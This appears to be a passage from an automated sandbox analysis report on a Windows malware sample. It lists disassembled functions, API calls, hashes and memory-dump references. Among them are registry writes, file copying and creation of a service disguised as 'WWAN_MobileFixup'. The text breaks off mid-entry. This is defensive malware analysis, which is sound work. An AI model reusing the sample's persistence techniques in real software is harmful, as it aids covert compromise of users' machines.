                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 79 40417b-404185 80 404187-404192 GetCurrentProcess TerminateProcess 79->80 81 404198-4041ae 79->81 80->81 82 4041b0-4041b7 81->82 83 4041ec-404200 call 404214 81->83 84 4041b9-4041c5 82->84 85 4041db-4041eb call 404214 82->85 94 404212-404213 83->94 95 404202-40420c ExitProcess 83->95 87 4041c7-4041cb 84->87 88 4041da 84->88 85->83 91 4041cd 87->91 92 4041cf-4041d8 87->92 88->85 91->92 92->87 92->88
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 0040418B
                                                                            • TerminateProcess.KERNEL32(00000000,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 00404192
                                                                            • ExitProcess.KERNEL32 ref: 0040420C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: c2260ba4ba3a7ce087c0bc5af1c4df8ffe5f30a9fab647541faefa4ff898e018
                                                                            • Instruction ID: 513b21a01c22477a45cfaa627a8dde47c11b7c557bbe69d9200b46c06abf8301
                                                                            • Opcode Fuzzy Hash: c2260ba4ba3a7ce087c0bc5af1c4df8ffe5f30a9fab647541faefa4ff898e018
                                                                            • Instruction Fuzzy Hash: 36012DB1644301DADA10AF64FD8CA0A77A4EBE0350B10457FF6417B2E0C739A8D1CB2E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040223C Relevance: 4.5, APIs: 3, Instructions: 12timeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCommandLineW.KERNEL32 ref: 0040223C
                                                                            • CommandLineToArgvW.SHELL32(00000000), ref: 0040B040
                                                                            • GetLocalTime.KERNEL32(00409FB8), ref: 0040B942
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CommandLine$ArgvLocalTime
                                                                            • String ID:
                                                                            • API String ID: 3768950922-0
                                                                            • Opcode ID: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                            • Instruction ID: fe59c91cec6a1bbfec2f2a739a0674a99631b7336b4ea49b5c82aa235aaf9e13
                                                                            • Opcode Fuzzy Hash: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                            • Instruction Fuzzy Hash: F4D01273448012EBC2007BE19A0E99D37E5A64A3523224077F243F11E1CB3C44959B6F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 103 40b33b-40b342 104 40b344-40b349 103->104 105 40b398-40ba76 CopyFileA 103->105 104->105 107 402760-402761 105->107 108 40ba7c 105->108 110 40ba7e 108->110 110->110
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CopyFile
                                                                            • String ID: ?NI
                                                                            • API String ID: 1304948518-117959909
                                                                            • Opcode ID: 1ba00870fd27b3cdf3e8498eb1257aa92a605fb7dfbe0c732b82863bd5f53ab8
                                                                            • Instruction ID: c2822da89412b159851219babc5dd957992176794b394267062855fcf32f5c0e
                                                                            • Opcode Fuzzy Hash: 1ba00870fd27b3cdf3e8498eb1257aa92a605fb7dfbe0c732b82863bd5f53ab8
                                                                            • Instruction Fuzzy Hash: 77D02B3138921246CD0265242E0EAF67309C7A3349B241977ED07FF2C0D1B9861762CD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040325A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 112 40325a-403278 HeapCreate 113 4032b0-4032b2 112->113 114 40327a-403287 call 403112 112->114 117 403296-403299 114->117 118 403289-403294 call 4032b7 114->118 119 4032b3-4032b6 117->119 120 40329b call 403b08 117->120 124 4032a0-4032a2 118->124 120->124 124->119 125 4032a4-4032aa HeapDestroy 124->125 125->113
                                                                            APIs
                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                              • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                            • HeapDestroy.KERNEL32 ref: 004032AA
                                                                              • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                            • String ID:
                                                                            • API String ID: 2507506473-0
                                                                            • Opcode ID: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                            • Instruction ID: bdc1dc1f8be9f1a85e4812a31df9c453441b6f572615afd11c7cbbe7009e603d
                                                                            • Opcode Fuzzy Hash: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                            • Instruction Fuzzy Hash: 08F0E5319043015AEF245F306E463263EA8DB50397F1184BFF401F82D1EB78C790950A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B40C Relevance: 3.0, APIs: 2, Instructions: 12registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 126 40b40c-40b4d9 RegQueryValueExA 128 40b92e 126->128 129 40b822-40b82b RegCloseKey 128->129 130 40b934-40ba4e 128->130 129->128 133 40ba54 130->133
                                                                            APIs
                                                                            • RegQueryValueExA.KERNELBASE ref: 0040B4D1
                                                                            • RegCloseKey.KERNELBASE(?), ref: 0040B825
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: 134ce427d92d70c0111e1806a8c5cfdfd9407f9f49210c1a287f1998412d3728
                                                                            • Instruction ID: a3e4645529f843f61550e48a598415364148f40a2ce15bb9cbadf78dc0097e25
                                                                            • Opcode Fuzzy Hash: 134ce427d92d70c0111e1806a8c5cfdfd9407f9f49210c1a287f1998412d3728
                                                                            • Instruction Fuzzy Hash: A4D0C931948106EAC7009FB08F0D5397EA9FA083417218577A603B00E0D7BD46126A9E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B4FC Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 134 40b4fc-40b50e 135 40b510-40b528 134->135 136 40b4d3-40b4e6 CreateDirectoryA 134->136 138 40b52a-40b535 135->138 139 40b59d-40b5b5 135->139 141 40b58b 138->141 140 40b5b7-40b5b9 139->140 139->141 141->139
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE ref: 0040B4E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory
                                                                            • String ID:
                                                                            • API String ID: 4241100979-0
                                                                            • Opcode ID: fcd0fb28436346cebec9de2a814f493663ffb4acfc5454b8ba783580e8604382
                                                                            • Instruction ID: ebd2c6e02f9d43b3d40f01d17a74bd438e6d2ac48b0db6d6420a9778e4eaa713
                                                                            • Opcode Fuzzy Hash: fcd0fb28436346cebec9de2a814f493663ffb4acfc5454b8ba783580e8604382
                                                                            • Instruction Fuzzy Hash: 4BF0A26345C29CAFC321D5B83C448E23F74F5931507554EA7D151AF087D2198953C3CD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004028FD Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 142 4028fd-40b3c8 RegOpenKeyExA 144 40b934-40b936 142->144 145 40ba4e 142->145 144->145 145->144 146 40ba54 145->146
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(80000002), ref: 0040B3C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 8340735e36433d2e621e99962aac8dbece34f8ed7b0fbf864752116af6356328
                                                                            • Instruction ID: 909e799b75931c5b62772d4b2f3710706e3fc10ef07775b3481c305365d9140b
                                                                            • Opcode Fuzzy Hash: 8340735e36433d2e621e99962aac8dbece34f8ed7b0fbf864752116af6356328
                                                                            • Instruction Fuzzy Hash: 72C04C60608146EAE6089AB189096762768EB44740F3149378913F16D0D339DA1665AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B3EA Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 148 40b3ea-40ba04 RegSetValueExA
                                                                            APIs
                                                                            • RegSetValueExA.KERNELBASE(?), ref: 0040B9FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID:
                                                                            • API String ID: 3702945584-0
                                                                            • Opcode ID: 5317ccae25348d6653a0bc53609ee191fbdf3e00c6017a1cf178d5707409b4b6
                                                                            • Instruction ID: 4d13c9e98189893827979a362c4bd14f52071052fe37cb831e46076aa9f9f1e9
                                                                            • Opcode Fuzzy Hash: 5317ccae25348d6653a0bc53609ee191fbdf3e00c6017a1cf178d5707409b4b6
                                                                            • Instruction Fuzzy Hash: 9FC08CB1804409FACB061BD09C08A3C7E3AE708788F200462E10330CA0C33E0BB2BB6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B397 Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 151 40b397-40ba76 CopyFileA 154 402760-402761 151->154 155 40ba7c 151->155 157 40ba7e 155->157 157->157
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CopyFile
                                                                            • String ID:
                                                                            • API String ID: 1304948518-0
                                                                            • Opcode ID: 7d38dac9929fb4991dc41ff22106602b2e1087a9a39ff8f9de006141421cb0d1
                                                                            • Instruction ID: 4b668b5fb2a19e430f9510732bbbf35e32ddcc61e88bebebdf2395f5775374df
                                                                            • Opcode Fuzzy Hash: 7d38dac9929fb4991dc41ff22106602b2e1087a9a39ff8f9de006141421cb0d1
                                                                            • Instruction Fuzzy Hash: AAB012B4384214A6E5006A300F8DF37121DDB007C1F1400333507F60E0C6FCC981657E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B4DE Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 162 40b4de-40b4e6 CreateDirectoryA
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE ref: 0040B4E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory
                                                                            • String ID:
                                                                            • API String ID: 4241100979-0
                                                                            • Opcode ID: c151bc14e0bb91fbb8e7eca4dafd0b7c5a4a5b715ebfa07865c3b19ad9e5cb26
                                                                            • Instruction ID: d70fb2d4326590eea8b65127b1b419e7c4e084d95afc867c60e11a96707e2c92
                                                                            • Opcode Fuzzy Hash: c151bc14e0bb91fbb8e7eca4dafd0b7c5a4a5b715ebfa07865c3b19ad9e5cb26
                                                                            • Instruction Fuzzy Hash: 64A0223008A020EAE00023000EA8C2B3C3CF8003C23208033B303B00C0833E080302BF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004028DB Relevance: 1.5, APIs: 1, Instructions: 4registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 163 4028db-4028e1 RegCloseKey 164 40286b 163->164 164->163
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 990c3c1dea4594085966e104cf6a03199e71a4503b704534c7eb79dcaa3d89bf
                                                                            • Instruction ID: 76804de5ad9cf923849592551e73c5d136ae12485515376d4ea460b458854c4b
                                                                            • Opcode Fuzzy Hash: 990c3c1dea4594085966e104cf6a03199e71a4503b704534c7eb79dcaa3d89bf
                                                                            • Instruction Fuzzy Hash: 5DA01230C04409C7C20497A0C30C4283AB459043043114072C113B00D0C37C5502550A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004028A6 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExA.KERNELBASE ref: 004028A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: c119085e98968012a478d05f9da36ab8ada70fc996d553aa7d263a9e4816e65c
                                                                            • Instruction ID: 94413375a01e53b797accf35fc7fe945d277f428ce3223a44cf6c20e190ec76b
                                                                            • Opcode Fuzzy Hash: c119085e98968012a478d05f9da36ab8ada70fc996d553aa7d263a9e4816e65c
                                                                            • Instruction Fuzzy Hash: 31900230344101EAE2104B315B0C21A2598550464571104355B0BE4190D6748511551D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B323 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: ManagerOpen
                                                                            • String ID:
                                                                            • API String ID: 1889721586-0
                                                                            • Opcode ID: dfaf3f851df420e3e7b0c4056ca2fcc5e50da974e7909aa90e6769422c755a01
                                                                            • Instruction ID: 893d3e26ed5c51661bf8be8d29d2bb54a563af28b692fefe241a45f5ad98b385
                                                                            • Opcode Fuzzy Hash: dfaf3f851df420e3e7b0c4056ca2fcc5e50da974e7909aa90e6769422c755a01
                                                                            • Instruction Fuzzy Hash: D29002201540019FC2504F105FAD01825D251403063710435E203F40E0D6744455A92E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040226E Relevance: 1.3, APIs: 1, Instructions: 38stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 1586166983-0
                                                                            • Opcode ID: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                            • Instruction ID: b9dd472658aa79e8713cc1c43643f3a09ee23d5b7ec078f99577b19effab2280
                                                                            • Opcode Fuzzy Hash: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                            • Instruction Fuzzy Hash: 54F09A3260C2538EC74216656A082B67BA0AA51710B38847B9C87B51D2DBBC485376AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00402572 Relevance: 1.5, APIs: 1, Instructions: 11serviceCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CreateService
                                                                            • String ID:
                                                                            • API String ID: 1592570254-0
                                                                            • Opcode ID: 20bb668e72a770e7973f593bb331a6a58a03ea000dbdcb0468e7c3fb687a14c6
                                                                            • Instruction ID: e828ca7ff849c5aa2293def9fffda87c5c0e13961c3d7613c3eafe11c79639c0
                                                                            • Opcode Fuzzy Hash: 20bb668e72a770e7973f593bb331a6a58a03ea000dbdcb0468e7c3fb687a14c6
                                                                            • Instruction Fuzzy Hash: C7C04C30888105EBCB644F40AD58D2B3A79D680315B714876E507B69D0D33D6D56BAFF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
                                                                            • GetLastError.KERNEL32 ref: 00402422
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                            • GetLastError.KERNEL32 ref: 00402450
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 00402480
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 004024CA
                                                                            Strings
                                                                            • WWAN_MobileFixup 2.33.197.66, xrefs: 004023BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                            • String ID: WWAN_MobileFixup 2.33.197.66
                                                                            • API String ID: 3346042915-2719033208
                                                                            • Opcode ID: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                            • Instruction ID: 16ab96e2cb68f3bca67a8d02827ccf702012fa4ba7b91bfe8048b6e668af4302
                                                                            • Opcode Fuzzy Hash: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                            • Instruction Fuzzy Hash: A621ECB0841310ABC2109F16EF4D9167EB8EBCA758F11413AE105BA2B2C7B94575CFAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405857 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                            • API String ID: 2238633743-4044615076
                                                                            • Opcode ID: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                            • Instruction ID: 8e14f7a6750b1570260f033f2342e22bcd7c780a38ad1719db35514165c9b09a
                                                                            • Opcode Fuzzy Hash: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                            • Instruction Fuzzy Hash: 9F015232600701AFDB11EFB5AD80A1B3BE8EB45740315043AB909F2591D678D8359F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405B1F Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                            • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                            • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: String$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 352835431-0
                                                                            • Opcode ID: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                            • Instruction ID: 228655485731442308ac41690fb54a5bf4aece3cc6a962a44786cceaeb1d8e11
                                                                            • Opcode Fuzzy Hash: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                            • Instruction Fuzzy Hash: 94518931504609AFDF228F55CD45EAF7FB9EB48744F20412AF912B12A0D3398D21DF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404BF9 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
                                                                            • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                            • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandleModuleNameWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                            • API String ID: 3784150691-4022980321
                                                                            • Opcode ID: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                            • Instruction ID: f140c2e8ca9dd112070b7b1a63e93dd9695d020ae797257d07982e8dddccbb03
